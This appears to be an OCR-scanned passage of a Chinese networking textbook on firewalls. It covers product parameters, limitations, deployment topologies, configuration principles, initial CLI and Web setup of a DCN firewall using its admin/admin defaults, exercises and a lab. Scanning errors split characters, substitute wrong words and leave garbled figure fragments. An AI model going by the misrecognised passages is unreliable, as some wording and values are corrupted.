OD 混合 模式 。 防 火 墙 既 存在 工作 在 路 由 模式 的 接口 (接口 具有 IP 地 址 ) ,又 存在 工作 
在 透明 模式 的 接口 (接口 无 IP 地 址 )。 混 合 模式 主要 用 于 透明 模式 作 双 机 备份 的 情况 ,此 时 
启动 VRRP( Virtual Router Redundancy Protocol ,虚拟 路 由 宛 余 协议 ) 功 能 的 接口 需要 配 
置 IP 地 址 ,其 他 接口 不 配置 IP 地 址 。 

7. 接口 

防火 墙 的 接口 可 分 为 以 太 口 (10Mb/s) ,快速 以 太 口 (100Mb/s) ,前兆 以 太 口 (1000Mbys) 
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3 种 类 型 。 防 火 墙 一 般 都 预先 设 有 内 网 口 、 外 网 口 . DMZ 区 接口 和 默认 规则 ,有 的 防火 墙 也 
预 留 了 其 他 接口 用 于 用 户 自 定义 其 他 的 独立 保护 区 域 。 防 火 墙 上 的 RS-232 Console 口 主 
要 用 于 初始 化 防火 墙 时 进行 基本 的 配置 或 用 于 系统 维护 。 另 外 ,有 的 防火 墙 还 有 可 能 提供 
PCMCIA {hi IDS 镜像 口 .高 可 用 性 接口 CHA) 等 ,这 些 是 由 防火 墙 的 功能 来 决定 的 。 

8. 用 户 数 限制 

防火 墙 的 用 户 数 限制 分 为 固定 限制 用 户 数 和 无 用 户 数 限制 两 种 。 前 者 ,如 SOHO 型 防 
火 墙 ,一 般 支持 几 十 到 几 百 个 用 户 不 等 ,而 无 用 户 数 限制 大 多 用 于 大 的 部 门 或 公司 。 注 
意 : 用 户 数 和 并 发 连接 数 是 完全 不 同 的 两 个 概念 ,并 发 连接 数 是 指 防火 墙 的 最 大 会 话 数 
(或 进程 ) ,每 个 用 户 可 以 在 一 个 时 间 里 产生 很 多 的 连接 ,在 购买 产品 时 要 区 分 这 两 个 

9. VPN 支持 

虚拟 专用 网 络 (Virtual Private Network, VPN) 可 以 理解 成 是 虚拟 出 来 的 企业 内 部 专 
线 。 它 可 以 通过 特殊 的 加 密 通信 协议 在 连接 在 Internet. 上 的 位 于 不 同 地 方 的 两 个 或 多 个 企 
业内 部 网 之 间 建 立 一 条 专 有 的 通信 线路 。 目 前 , 绝 大 部 分 防火 墙 产品 都 支持 VPN 功能 ,但 
也 有 少 部 分 不 支持 ,建议 在 选 购 时 注意 此 参数 。 

10. 安全 过 滤 带 宽 

安全 过 滤 带 宽 是 指 防火 墙 在 某 种 加 密 算法 标准 下 ,如 DES(56 位 ) 或 3DES(168 位 ) 下 
的 整体 过 滤 性 能 。 它 是 相对 于 明文 带宽 提出 的 。 一 般 来 说 ,防火 墙 总 的 吞吐 量 越 大 ,其 对 应 
的 安全 过 滤 带 宽 越 高 。 


4.6 防火 墙 的 缺陷 


从 安全 的 范畴 而 言 , 防 火 墙 不 能 解决 所 有 问题 ,尤其 存在 以 下 几 个 方面 缺陷 。 

1. 防火 墙 可 以 阻 断 攻击 .但 不 能 消灭 攻击 源 

“各 扫 自 家 门 前 雪 , 不 管 他 人 瓦 上 霜 ”, 就 是 目前 网 络 安全 的 现状 。 互 联网 上 病毒 ,木马 、 
恶意 试探 等 攻击 行为 络绎 不 绝 , 设 置 得 当 的 防火 墙 能 够 阻挡 它们 ,但 是 无 法 清除 攻击 源 。 即 
使 防火 墙 进行 了 良好 的 设置 ,使 得 攻击 无 法 穿 透 防火 墙 ,但 各 种 攻击 仍然 会 不 断 地 向 防火 墙 
发 出 尝试 。 例 如 , 接 主 干 网 10MB 网 络 带 宽 的 某 站 点 ,其 日 常 流量 中 大 约 有 512KB 是 攻击 
行为 。 那 么 ,即使 成 功 设置 了 防火 墙 ,这 512KB 的 攻击 流量 依然 不 会 有 丝毫 减少 。 

2. 防火 墙 不 能 抵抗 最 新 的 未 设置 策略 的 攻击 漏洞 

就 如 杀毒 软件 与 病毒 一 样 ,总 是 先 出 现 病毒 ,杀毒 软件 经 过 分 析出 特征 码 后 加 入 到 病毒 
库 内 才能 查 杀 。 防 火 墙 的 各 种 策略 ,也 是 在 该 攻击 方式 经 过 专家 分 析 后 给 出 其 特征 进而 设 
置 的 。 如 果 世 界 上 新 发 现 某 个 主机 漏洞 的 黑客 把 第 一 个 攻击 对 象 选中 了 您 的 网 络 , 那 么 防 
火 墙 也 没有 办 法 帮 到 您 。 

3. 防火 墙 的 并 发 连接 数 限制 容易 导致 拥塞 或 者 溢出 

由 于 要 判断 ` 处 理 流 经 防火 墙 的 每 一 个 包 , 因 此 防火 墙 在 某 些 流量 大 、 并 发 请 求 多 的 情 
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BU ,很 容易 导致 拥塞 ,成 为 整个 网 络 的 瓶颈 而 影响 性 能 。 而 当 防 火 墙 溢出 的 时 候 , 整 个 防 
线 就 如 同 虚设 ,原本 被 禁止 的 连接 也 能 从 容 通 过 了 。 

4. 防火 墙 对 服务 器 合法 开放 的 端口 的 攻击 大 多 无 法 阻止 

某 些 情况 下 ,攻击 者 利用 服务 器 提供 的 服务 进行 缺陷 攻击 。 例 如 ,利用 开放 了 3389 端 
口 取得 没 打 过 SP 补丁 的 Windows 2000 的 超级 权限 、 利 用 ASP 程序 进行 脚本 攻击 等 。 由 
于 其 行为 在 防火 墙 一 级 看 来 是 “合理 ”和 “合法 ”的 ,因此 被 简单 地 放行 了 。 

5. 防火 墙 对 待 内 部 主动 发 起 连接 的 攻击 一 般 无 法 阻止 

“外 紧 内 松 "是 一 般 局 域 网 络 的 特点 。 或 许 一 道 严密 防守 的 防火 墙 内 部 的 网 络 是 一 片 混 
乱 也 有 可 能 。 通 过 发 送 带 木马 的 邮件 、 带 木马 的 URL 等 方式 ,然后 由 中 木马 的 机 器 主动 对 
攻击 者 连接 ,将 铁 壁 一 样 的 防火 墙 阴间 破 坏 掉 。 另 外 ,对 于 防火 墙 内 部 各 主机 间 的 攻击 行 
为 ,防火 墙 也 只 有 如 旁观 者 一 样 冷 视 而 爱 莫 能 助 。 

6. 防火 墙 不 处 理 病 毒 

不 管 是 funlove 病毒 还 是 CIH 病毒 ,在 内 网 用 户 下 载 外 网 的 带 毒 文件 的 时 候 , 防 火 墙 是 
不 为 所 动 的 。 








4.7 防火 墙 的 部 署 


在 实际 应 用 中 ,网 络 环境 差异 性 较 大 ,并 且 各 种 产品 的 适用 范围 和 配置 方法 也 不 同 , 因 
此 部 署 防火 墙 的 步骤 与 方法 也 有 较 大 差异 。 本 节 只 讨论 防火 墙 部 署 中 的 共性 问题 。 

l. 普通 企业 环境 

这 是 最 为 普通 的 企业 环境 防火 墙 部 署 案 例 。 利 用 防火 墙 将 网 络 分 为 3 个 安全 区 域 , 即 
企业 内 部 网 络 、 外 部 网 络 和 服务 器 专 网 (DMZ 区 )。 内 部 网 络 一 般 采 用 私有 的 IP 地 址 ， 
DMZ 的 服务 器 可 以 采用 公 网 地 址 ,也 可 以 采用 私有 地 址 ,但 是 需要 在 防火 墙 上 做 相应 的 地 
址 转换 来 保证 外 部 用 户 对 服务 器 的 正常 访问 。 一 般 常 用 的 安全 策略 : 外 部 网 络 不 允许 访问 
内 部 网 络 ,内 部 网 络 用 户 可 以 根据 不 同 的 权限 访问 Internet; 内 部 用 户 和 外 部 用 户 只 允许 访 
问 DMZ 区 指定 服务 器 的 指定 服务 。 具 体 环境 如 图 4-46 所 示 。 









4-46 普通 企业 环境 部 署 示意 图 
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2. ADSL 接 入 的 部 署 

ADSL 接 入 是 一 种 经 济 实惠 的 Internet 接 人 方式 ,防火 墙 提供 了 对 ADSL BEA, ,也 就 是 
PPPOE 拨号 的 支持 。 用 防火 墙 代替 原 有 的 拨号 客户 端 来 连接 ADSL Modem, 实 现 自动 拨 
号 功能 ,可 以 配置 防火 墙 自动 做 一 条 动态 的 地 址 转换 ,实现 内 部 的 多 个 用 户 通过 一 条 ADSL 
实现 对 互联 网 的 访问 ,这样 防火 墙 配置 的 一 般 策 略为 只 允许 内 部 网 络 访问 外 部 网 络 的 指定 
服务 。 具 体 的 环境 如 图 4-47 所 示 。 


ADSL Modem 








Linktrust Cyberwall 


4-47 ADSL 接 入 部 署 示意 图 


3. 网 络 多 出 口 部 署 

经 常会 碰 到 企业 的 局 域 网 有 多 个 出 口 ,如 Internet 出 口 .总 部 出 口 等 。 防 火 墙 支 持 将 
DMZ 接口 作为 一 个 外 网 接口 ,支持 多 出 口 的 接 入 。 例 如 ,可 以 将 防火 墙 的 外 网 口 接 
Internet 接 人 服务 器 ,将 DMZ 口 接 入 总 部 接 入 的 服务 器 ,利用 路 由 的 选择 来 分 流 去 往 两 个 
区 域 的 流量 ,可 以 将 默认 的 网 关 指 向 Internet 处 的 路 由 器 ,添加 相应 的 去 往 总 部 网 络 方向 的 
路 由 策略 。 然 后 针对 不 同 的 网 络 之 间 的 数据 通信 ,采用 相应 的 安全 策略 。 另 一 种 多 出 口 的 
接 人 方式 也 可 以 两 个 防火 墙 的 方式 ,分 别 对 应 于 相应 的 链 路 ,这 种 方式 也 可 以 利用 路 由 的 选 
择 来 实现 。 具 体 环境 如 图 4-48 和 图 4-49 所 示 。 














Router Router 
Switch Linktrust Cyberwall 











4-48 单 台 防火 墙 多 出 口 接 入 示意 图 


4. 分 布 式 网 络 环境 的 部 署 

分 布 式 的 环境 一 般 分 为 一 个 中 心 节点 和 多 个 分 支 节点 ,防火 墙 支持 对 这 种 结构 的 整体 
配置 。 一 般 来 说 ,中 心 节点 采用 性 能 高 的 防火 墙 ,可 以 采用 双 机 热 备份 的 模式 ,保证 网 络 的 
可 靠 性 ; 对 于 较 大 的 有 专线 接 入 的 分 支 节点 ,可 以 采用 防火 墙 ,一 方面 保证 该 分 支 网 络 的 边 
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Router Router 


Linktrust Cyberwall Linktrust Cyberwall 











= X Switch 
图 4-49 两 台 防 火 墙 多 出 口 接 入 示意 图 


界 安全 ,另外 也 可 以 通过 VPN 功能 实现 与 总 部 的 信息 通信 的 安全 ; 对 于 没有 专线 的 分 支 节 
点 ,可 以 采用 防火 墙 自 带 的 对 子 网 拨号 的 VPN 功能 ,也 能 够 实现 与 总 部 之 间 的 安全 通信 。 


具体 环境 如 图 4-50 所 示 。 
Dual-Server Backup 


= = 


Linktrust Cyberwall 















Dalling... 








Linktrust Cyberwall Linktrust Cyberwall 


图 4-50 ”防火 墙 分 布 式 网 络 环境 部 署 示意 图 


4.8 防火 墙 的 配置 


防火 墙 的 配置 方法 不 是 千篇一律 的 ,不 要 说 不 同 品牌 ,就 是 同一 品牌 的 不 同型 号 也 不 完 
全 一 样 ,所 以 在 此 也 只 能 对 一 些 通用 防火 墙 配置 方法 作 一 基本 介绍 。 同 时 ,具体 的 防火 墙 策 
略 配置 会 因 具体 的 应 用 环境 不 同 而 有 较 大 区 别 。 首 先 介 绍 一 些 共 性 的 配置 原则 。 

1. 防火 墙 的 基本 配置 原则 

默认 情况 下 ,所 有 的 防火 墙 都 是 按 以 下 两 种 情况 配置 的 。 

(1) 拒绝 所 有 的 流量 ,需要 在 你 的 网 络 中 特殊 指定 能 够 进入 和 出 去 的 流量 的 一 些 类 型 。 

(2) 允许 所 有 的 流量 ,这 种 情况 需要 你 特殊 指定 要 拒绝 的 流量 的 类 型 。 

可 以 论证 ,大 多 数 防 火 墙 默认 都 是 拒绝 所 有 的 流量 作为 安全 选项 。 一 旦 安装 防火 墙 后 ， 
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就 需要 打开 一 些 必要 的 端口 来 使 防火 墙 内 的 用 户 在 通过 验证 之 后 可 以 访问 系统 。 换 句 话 
说 ,如 果 你 想 让 自己 的 员工 们 能 够 发 送 和 接收 E-mail, 则 必须 在 防火 墙 上 设置 相应 的 规则 或 
开启 允许 POP3 和 SMTP 的 进程 。 

在 防火 墙 的 配置 中 ,首先 要 遵循 的 原则 就 是 安全 实用 ,从 这 个 角度 考虑 ,在 防火 墙 的 配 
置 过 程 中 需要 遵循 以 下 3 个 基本 原则 。 

(1) 简单 实用 。 对 防火 墙 环 境 设计 来 讲 , 首 要 的 就 是 越 简单 越 好 。 

其 实 这 也 是 任何 事物 的 基本 原则 。 越 简单 的 实现 方式 , 越 容易 理解 和 使 用 。 而 且 是 设 
计 越 简单 , 越 不 容易 出 错 , 防 火 墙 的 安全 功能 越 容 易 得 到 保证 ,管理 也 越 可 靠 和 简便 。 

每 种 产品 在 开发 前 都 会 有 其 主要 功能 定位 ,例如 防火 墙 产 品 的 初衷 就 是 实现 网 络 之 间 
的 安全 控制 ,入 侵 检 测 产品 主要 针对 网 络 非法 行为 进行 监控 。 但 是 随 着 技术 的 成 熟 和 发 展 ， 
这 些 产 品 在 原来 的 主要 功能 之 外 或 多 或 少 地 增加 了 一 些 增值 功能 ,例如 在 防火 墙 上 增加 了 
查 杀 病 毒 、 入 侵 检测 等 功能 ,在 和 人 侵 检测 上 增加 了 病毒 查 杀 功能 。 但 是 这 些 增值 功能 并 不 是 
所 有 应 用 环境 都 需要 ,在 配置 时 也 可 针对 具体 应 用 环境 进行 配置 ,不 必 对 每 一 功能 都 详细 配 
置 ,这 样 一 则 会 大 大 增强 配置 难度 ,同时 还 可 能 因 各 方面 配置 不 协调 ,引起 新 的 安全 漏洞 而 
得 不 偿 失 。 

(2) 全 面 深入 。 单 一 的 防御 措施 是 难以 保障 系统 安全 的 ,只 有 采用 全 面 的 ,多 层次 的 深 
层 防 御 战 略 体 系 才 能 实现 系统 的 真正 安全 。 

在 防火 墙 配置 中 ,不 要 停留 在 几 个 表面 的 防火 墙 语句 上 ,而 应 系统 地 看 待 整个 网 络 的 安 
全 防护 体系 ,尽量 使 各 方面 的 配置 相互 加 强 , 从 深层 次 上 防护 整个 系统 。 这 可 以 体现 在 两 个 
方面 : 一 方面 体现 在 防火 墙 系统 的 部 署 上 ,多 层次 的 防火 墙 部 署 体系 , 即 采用 集 互 联网 边界 
防火 墙 .部 门 边界 防火 墙 和 主机 防火 墙 于 一 体 的 层次 防御 ; 另 一 方面 将 和 人 侵 检测 、 网 络 加 
密 、 病 毒 查 杀 等 多 种 安全 措施 结合 在 一 起 的 多 层 安全 体系 。 

(3) 内 外 兼顾 。 防 火 墙 的 一 个 特点 是 防 外 不 防 内 ,其 实在 现实 的 网 络 环境 中 ,80% 以 上 
的 威胁 都 来 自 内 部 ,所 以 要 树立 防 内 的 观念 ,从 根本 上 改变 过 去 那 种 防 外 不 防 内 的 传统 

对 内 部 威胁 可 以 采取 其 他 安全 措施 ,如 入 侵 检测 ,主机 防护 ,漏洞 扫描 ,病毒 查 杀 。 这 方 
面体 现在 防火 墙 配置 方面 就 是 要 引入 全 面 防护 的 观念 ,最 好 能 部 署 与 上 述 内 部 防护 手段 一 
起 联动 的 机 制 。 

2. 防火 墙 的 初始 配置 

像 路 由 器 一 样 ,在 使 用 之 前 ,防火 墙 也 需要 经 过 基本 的 初始 配置 。 但 因 各 种 防火 墙 的 初 
始 配置 基本 类 似 , 所 以 在 此 仅 以 神州 数码 1800 系列 防火 墙 为 例 进行 介绍 。 

神州 数码 防火 墙 的 Console 口 配置 环境 ,将 PC 的 串口 与 防火 墙 Console 口 连接 起 来 ; 
Windows 系统 的 超级 终端 (Hyper Terminal) 程 序 建立 与 防火 墙 的 连接 ,配置 终端 参数 : 波 
特 率 9600b/s 数据 位 8、 奇偶 校 验 位 无 和 停止 位 1; 给 防火 墙 上 电 , 防 火 墙 系统 自 检 ,进行 系 
统 初始 化 配置 ; 系统 启动 成 功 ,出 现 登 录 提示 “login:“”, 输 入 默认 管理 员 名 称 admin ,出 现 口 
令 提 示 password, 输 入 默认 口令 admin, 此 时 用 户 便 成 功 登 录 并 且 进 入 CLI 配置 界面 。 

神州 数码 防火 墙 的 Telnet 配置 环境 ,防火 墙 各 项 条 件 已 经 满足 : 第 一 ,已 经 为 防火 墙 
被 连接 接口 配置 了 正确 的 IP 地 址 ,并 且 开 启 了 该 接口 的 Telnet 管理 功能 ,在 接口 配置 模式 
下 执行 manage telnet 命令 ; 第 二 ,在 配置 终端 与 防火 墙 之 间 有 可 达 路 由 。 
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神州 数码 防火 墙 的 Telnet 配置 环境 : 第 一 步 ,将 计算 机 的 以 太 网 口 通过 局 域 网 或 广 域 
网 与 防火 墙 的 以 太 网 口 相连 接 , 如 图 4-51 所 示 ; 第 二 步 , 运 行 manage telnet 命令 开启 被 连 
接 接口 的 Telnet 管理 功能 ; 第 三 步 ,在 计算 机 上 运行 
Telnet 程序 ;第 四 步 ,与 防火 墙 建立 连接 ,认证 通过 后 出 
现 登录 提示 符 “login: ”, 输 入 默认 管理 员 名 称 admin, tH 
现 口令 提示 符 “password: ”, 输 入 admin, 此 时 用 户 便 成 
功 登录 并 且 进 入 CL 配置 界面 ; 第 五 步 , 用 命令 对 安全 网 
关 进 行 配置 或 者 查看 安全 网 关 的 运行 状态 ,使 用 命令 时 可 
随时 输入 “*?” 寻 求 帮助 。 

神州 数码 防火 墙 的 Web 界面 配置 环境 : 神州 数码 防火 墙 的 Ethernet0/0 接口 配 有 默认 
IP 地 址 192. 168. 1. 1/24 ,并 且 该 接口 的 各 种 管理 功能 均 为 开启 状态 ; 防火 墙 初次 使 用 安全 
网 关 时 ,用户 可 以 通过 该 接口 访问 防火 墙 的 Web 界面 页 面 。 第 一 步 , 将 管理 PC 的 IP 地 址 
设置 为 与 192. 168. 1. 1/24 同 网 段 的 IP 地 址 ,并 且 用 网 线 将 管理 PC 与 安全 网 关 的 
Ethernet0/0 接口 进行 连接 。 第 二 步 ,在 管理 PC 的 Web 浏览 器 中 访问 地 址 http://192. 


168.1. 


admin) 





Console 




















图 4-51 Telnet 配置 环境 示意 图 


,出 现 登 录 页 面 , 如 图 4-52 所 示 ; 第 三 步 ,输入 防火 墙 默认 的 用 户 名 和 口令 ( 均 为 




















; 第 四 步 ,登录 防火 墙 主 页 ,如 图 4-53 所 示 。 
| 192.168.0.1 
DCN 
用 户 各 [admin 
BB þer | | 
言  OEngish ex 
L me jJ 











图 4-52 Web 界面 配置 环境 示意 图 


防火 墙 与 路 由 器 一 样 , 也 有 4 种 用 户 配置 模式 , 即 普通 模式 (Unprivileged Mode) 特权 
模式 (Privileged Mode) M AR (Configuration Mode) 和 端口 模式 (Interface Mode) ,进入 


这 4 种 


用 户 模 式 的 命令 也 与 路 由 器 一 样 。 


普通 用 户 模式 不 需要 特别 命令 ,启动 后 即 进入 ; 进入 特权 用 户 模 式 的 命令 为 enable; 进 
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4-53 防火 墙 界面 示意 图 


人 配置 模式 的 命令 为 “config terminal”; 进入 端口 模式 的 命令 为 “interface ethernet. x*”。 不 
过 因为 防火 墙 的 端口 没有 路 由 器 那么 复杂 ,所 以 通常 把 端口 模式 归 为 配置 模式 ,统称 为 “全 
局 配置 模式 ”。 

神州 数码 防火 墙 提 供 一 系列 命令 以 及 命令 行 接口 (Command Line Interface, CLD) ,使 
用 户 能 够 对 防火 墙 进行 配置 和 管理 。 

CLI 有 不 同 级 别 的 命令 模式 ,一 些 命令 只 有 在 特定 的 命令 模式 下 才 可 使 用 。 例 如 ,只 有 
在 相应 的 配置 模式 下 , 才 可 以 输入 并 执行 配置 命令 ,这 样 也 可 以 防止 意外 破坏 已 有 的 配置 。 
不 同 的 命令 模式 都 有 其 相应 的 CLI 提示 符 。 

1) 关于 防火 墙 的 执行 模式 

用 户 进 入 到 CLI 时 的 模式 是 执行 模式 。 执 行 模式 允许 用 户 使 用 其 权限 级 别 允 许 的 所 
有 的 设置 选项 。 该 模式 的 提示 符 如 下 ,包含 了 一 个 井 号 (#): 


hostname # 
2) 关于 防火 墙 的 全 局 配置 模式 


全 局 配置 模式 允许 用 户 修改 防火 墙 的 配置 参数 。 用 户 在 执行 模式 下 ,输入 configure 命 
令 , 可 进入 全 局 配置 模式 。 该 模式 的 提示 符 如 下 : 

hostname(conf ig) # 

3) 关于 防火 墙 的 子 模块 配置 模式 

防火 墙 的 不 同 模块 功能 需要 在 其 对 应 的 命令 行 子 模块 模式 下 进行 配置 。 用 户 在 全 局 配 
置 模式 输入 特定 的 命令 ,可 以 进入 相应 的 子 模块 配置 模式 。 例 如 ,运行 interface ethernet0/0 
命令 进入 ethernet0/0 接口 配置 模式 ,此 时 的 提示 符 变 更 为 : 


hostname(conf ig-if-eth0/0) # 
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4) 关于 防火 墙 CLI 命 令 模式 切换 

用 户 登 录 到 防火 墙 CLI 就 进入 到 CLI 的 执行 模式 。 用 户 可 以 通过 不 同 的 命令 在 各 种 
命令 模式 之 间 进 行 切 换 。 

执行 模式 到 全 局 配置 模式 ,用 configure 命令 ; 全 局 配置 模式 到 子 模 块 配置 模式 ,不 同 
功能 使 用 不 同 的 命令 进入 各 自 的 命令 配置 模式 ; 退回 到 上 一 级 命令 模式 ,用 exit 命令 ; 从 
任何 模式 退回 到 执行 模式 ,用 end 命令 。 

防火 墙 主要 由 安全 规则 、 身 份 认证 工具 、 包 过 滤 和 应 用 网 关 4 个 部 分 组 成 。 

1. 安全 规则 

防火 墙 的 基本 原理 是 对 内 部 网 络 与 外 部 网 络 之 间 的 信息 流 进行 控制 ,这 种 控制 功能 是 
通过 在 防火 墙 中 预先 设 定 的 安全 规则 (也 称 为 安全 策略 ) 实 现 的 。 防 火 墙 的 安全 规则 由 匹配 
条 件 和 处 理 方式 两 个 部 分 构成 ,其 中 匹配 条 件 是 一 些 逻 辑 表达 式 , 根 据 数据 包 中 的 特定 值 域 
可 以 计算 出 逻辑 表达 式 的 值 ,如 果 人 逻辑 表达 式 的 值 为 真 , 则 说 明 该 信息 与 当前 的 安全 规则 相 
匹配 ,信息 一 旦 与 安全 规则 相 匹 配 ,就 必须 采用 安全 规则 中 的 处 理 方式 进行 处 理 。 

一 般 来 说 ,大 多 数 防火 墙 的 安全 规则 的 处 理 方式 包括 以 下 几 种 。 

(D Accept: 允许 数据 包 或 信息 通过 。 

© Reject: 拒绝 数据 包 或 信息 通过 ,并 且 通 知 信息 源 该 信息 被 禁止 。 

@ Drop: 直接 将 数据 包 或 信息 丢弃 ,并 且 不 通知 信息 源 。 

通常 ,所 有 的 防火 墙 产品 在 设计 时 有 两 个 基本 策略 。 一 是 一 切 未 被 允许 的 就 是 禁止 的 ， 
即 只 允许 通过 在 系统 中 已 经 认可 的 合法 的 服务 ,而 拒绝 其 他 所 有 的 未 做 规定 的 服务 ; 二 是 
一 切 未 被 禁止 的 就 是 允许 的 , 即 只 拒绝 在 系统 中 明确 不 允许 的 服务 ,而 允许 其 他 所 有 未 做 规 
定 的 服务 。 很 明显 ,前 一 种 策略 会 具有 很 高 的 安全 性 ,但 同时 也 限制 了 用 户 所 使 用 的 服务 种 
类 ,缺乏 使 用 方便 性 。 后 一 种 策略 使 用 较为 方便 ,规则 配置 较为 灵活 ,但 是 缺乏 安全 性 。 

2. 身份 认证 工具 

防火 墙 必 须 使 用 安全 的 身份 认证 ,才能 避免 非 授权 用 户 侵 入 内 部 系统 。 由 于 防火 墙 可 
以 集中 并 控制 网 点 的 访问 ,所 以 将 先进 的 认证 软件 或 硬件 安装 在 防火 墙 中 是 一 个 不 错 的 选 
择 , 这 种 将 各 种 认证 措施 集中 到 防火 墙 的 做 法 更 切合 实际 ,也 更 便于 管理 。 

3. 包 过 滤 

IP 数据 包 过 滤 一 般 由 包 过 滤 路 由 器 来 实现 , 包 过 滤 路 由 器 可 以 决定 对 它 所 收 到 的 每 个 
数据 包 的 取舍 ,路 由 器 对 每 发 送 或 接收 来 的 数据 包 审查 是 否 与 某 个 包 过 滤 规 则 相 匹配 , 如 果 
找到 一 个 匹配 , 且 规 则 允许 该 数据 包 通过 , 则 该 数据 包 根 据 路 由 表 中 的 信息 向 前 转发 。 如 果 
找到 一 个 与 规则 不 匹配 的 , 且 规 则 拒绝 此 数据 包 , 则 该 数据 包 将 被 舍弃 。 

4. 应 用 网 关 

应 用 网 关 ( 也 称 为 代理 服务 器 ) 上 安装 有 特殊 用 途 的 特别 应 用 程序 ,被 称 为 “代理 服务 ” 
或 “代理 服务 器 程序 ”。 使 用 代理 服务 后 ,内 部 网 络 用 户 与 外 部 网 络 资源 之 间 不 建立 直接 的 
网 络 连接 或 直接 的 网 络 通信 ,所 有 的 信息 交互 必须 借助 代理 服务 器 的 应 用 层 信 息 中 继 功 能 。 
因此 ,内 部 网 络 用 户 实际 上 是 与 应 用 层 代理 之 间 建 立 应 用 层 连 接 , 而 应 用 层 代 理 与 外 部 网 络 
资源 之 间 建 立 应 用 层 连接 。 
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J 题 4 


4-1 什么 是 防火 墙 ? 它 由 几 部 分 构成 ? 

4-2 防火墙 的 基本 功能 是 什么 ? 

4-3 ”防火 墙 的 经 典 体系 结构 有 哪些 ?简要 说 明 它们 的 优 、 缺 点 。 

4-4 防火 墙 规则 的 处 理 方式 中 ,Rejiect 和 Drop 有 何 区 别 ? 

4-5 防火 墙 的 两 条 默认 准则 是 什么 ? 

4-6 简 述 路 由 器 与 堡 参 主 机 上 的 信息 流向 的 区 别 。 

4-7 在 内 部 .外 部 网 络 之 间架 设 一 台 路 由 器 ,其 外 部 网 卡 IP 地 址 为 202. 101. 111.99. 
内 部 网 络 的 地 址 为 202. 101. 100. 0/255. 255. 255. 0, 路 由 器 的 内 部 网 卡 IP 地 址 为 202. 101. 
100.1。 请 根据 以 下 要 求 完 成 对 路 由 器 的 数据 包 过 滤 规 则 的 设置 : 要 禁止 UDP 数据 包 在 
内 部 、 外 部 网 络 之 间 的 传递 ; 四 允许 外 部 网 络 访问 内 网 的 WWW、FTP 服务 器 ,但 要 禁止 其 
他 基于 TCP 协议 的 服务 。 


实 训 4.1 防火 墙 管理 环境 配置 


【 实 训 目的 】 


内 网 用 户 首 次 访问 Internet 时 需要 通过 Web 认证 才能 上 网 , 且 内 网 用 户 划分 为 两 个 用 
户 组 , 即 usergroupl 和 usergroup2, 其 中 usergroupl 组 中 的 用 户 在 通过 认证 后 仅 能 浏览 
Web 页 面 ,usergroup2 组 中 的 用 户 通过 认证 后 仅 能 使 用 FTP。 学 会 使 用 超级 终端 .Telnet、 
WebUI 方 式 登录 防火 墙 ,掌握 防火 墙 管理 环境 的 搭建 方法 、 防 火 墙 的 路 由 模式 配置 ,其 拓扑 
结构 如 图 4-54 所 示 o 























[ Eno0 让 Ar o ER) 1 
! Zone: 可 信任 的 10 / i Zone: 不 可 信任 的 ， 
Zone: 可 信任 内 x | E EN 
d 1m 
LJ r-a- SRISUIDILLLGC ^ WEL----——-——— 
5 CA KB Wei > m 认证 通过 子 以 用 行 ___ > 
192.168.1.0/24 
第 一 次 认证 通过 后 ， 后 级 访问 予以 用 行 
图 4-54 ”防火 墙 路 由 模式 拓扑 
【 实 训 环 境 】 


A) V2 防火 墙 使 用 超级 终端 \Telnet、WebUI 方式 进行 管理 ,使 用 者 可 以 很 方便 地 使 用 
多 种 方式 进行 管理 。 
(2) 实 训 设备 DCFW-1800E-V2 防火 墙 ,软件 版 本 为 DCFOS-2. 0R4。 防 火 墙 设备 1 
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台 ,Console 线 1 条 ,交叉 网 络 线 1 条 ,PC1 台 。 
【 实 训 内 容 】 


1. 配置 PC 的 超级 终端 属性 , 接 入 防火 墙 命令 行 模式 
(1) 登录 防火 墙 并 熟悉 各 配置 模式 。 默 认 管 理 员 用 户口 令 和 口令 如 下 : 


login: admin 
password: admin 


输入 以 上 信息 后 ,可 进入 防火 墙 的 执行 模式 ,该 模式 的 提示 符 如 下 ,包含 了 一 个 数字 符 
SD: 

DCFW-1800 # 

在 执行 模式 下 ,输入 configure 命令 ,可 进入 全 局 配置 模式 。 提 示 符 如 下 : 

DCFW-1800 (conf ig) # 

V2 系列 防火 墙 的 不 同 模块 功能 需要 在 其 对 应 的 命令 行 子 模块 模式 下 进行 配置 。 在 全 
局 配置 模式 输入 特定 的 命令 可 以 进入 相应 的 子 模块 配置 模式 。 例 如 ,运行 interface 
ethernet0/0 命令 进入 ethernet0/0 接口 配置 模式 ,此 时 的 提示 符 变更 为 : 

DCFW-1800(conf ig-if-eth0/0) # 

A 4-7 列 出 了 常用 的 模式 切换 的 命令 。 

表 4-7 模式 切换 命令 





模 R 命 S 
执行 模式 到 全 局 配置 模式 config 
全 局 配置 模式 到 子 模块 配置 模式 不 同 功能 使 用 不 同 的 命令 进入 各 自 的 命令 配置 模式 
返回 到 上 一 级 命令 模式 exit 
从 任何 模式 退回 到 执行 模式 end 


(2) 通过 PC 测试 与 防火 墙 的 连通 性 。 使 用 交叉 双 绞 线 连接 防火 墙 和 PC, 此 时 防火 墙 
ff) LAN-link 灯亮 起 ,表明 网 络 的 物理 连接 已 经 建立 。 观 察 指示 灯 状 态 为 闪烁 ,表明 有 数据 
在 尝试 传输 。 

此 时 打开 PC 的 连接 状态 ,发现 只 有 数据 发 送 ,没有 接收 到 数据 ,这 是 因为 防火 墙 的 端 
口 默认 状态 下 都 会 禁止 向 未 经 验证 和 配置 的 设备 发 送 数据 ,以 保证 数据 的 安全 。 

2. 搭建 Telnet 管理 环境 

(1) 运行 manage telnet 命令 开启 被 连接 接口 的 Telnet 管理 功能 。 


Hostname # conf igure 

DCFW — 1800(conf ig) # interface Ethernet 0/0 

DCFW — 1800(config- if — eth0/0) # manage telnet 

(2) 配置 PC1 的 IP 地 址 为 192. 168. 1. 1. PCI 尝试 与 防火 墙 的 Telnet 进行 连接 。 
ik: 用 户 名 和 口令 是 默认 管理 员 用 户 名 和 口令 : admin, 如 图 4-55 所 示 。 
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4-55 Telnet 管理 


3. 搭建 WebUI 管理 环境 

初次 使 用 防火 墙 ,用 户 必 须 先 配置 WebUI 管理 防火 墙 的 环境 ,端口 .默认 路 由 、 管 理 主 
机 地 址 (参考 表 4-7), 如 图 4-56、 图 4-57 所 示 。 在 浏览 器 地 址 栏 输入 https://192. 168.1. 
254: 1211 即 可 。 


e DCFW1800 一 超级 终端 
XD SEO SEQ FUO WD Wo 





De 95 251 








# ifconfig if0 202.101.1.253/24 
# ifconfig ifl 192.168.1.254/24 
# ifconfig if2 10.1.1.254/24 

H route add default 202.101.1.254 
